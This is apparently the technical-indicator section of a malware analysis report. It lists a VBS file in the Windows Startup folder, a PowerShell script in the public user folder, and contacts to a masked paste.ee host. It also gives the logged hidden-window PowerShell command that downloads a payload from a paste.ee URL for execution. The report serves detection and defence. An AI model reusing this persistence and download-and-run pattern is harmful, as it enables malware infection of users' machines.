Technical Information
- %APPDATA%\microsoft\windows\start menu\programs\startup\edgeprocesshandler.vbs
- C:\users\public\e1gfb.ps1
- 'pa##e.ee':443
- 'pa##e.ee':443
- DNS ASK pa##e.ee
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy RemoteSigned -File C:\Users\Public\E1gFB.PS1
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy RemoteSigned -Command [System.Net.WebClient] $Client = New-Object System.Net.WebClient; [Byte[]] $DownloadedData = $Client.DownloadData('https://paste.ee/r/E1gFB/0'); [String] ...' (with hidden window)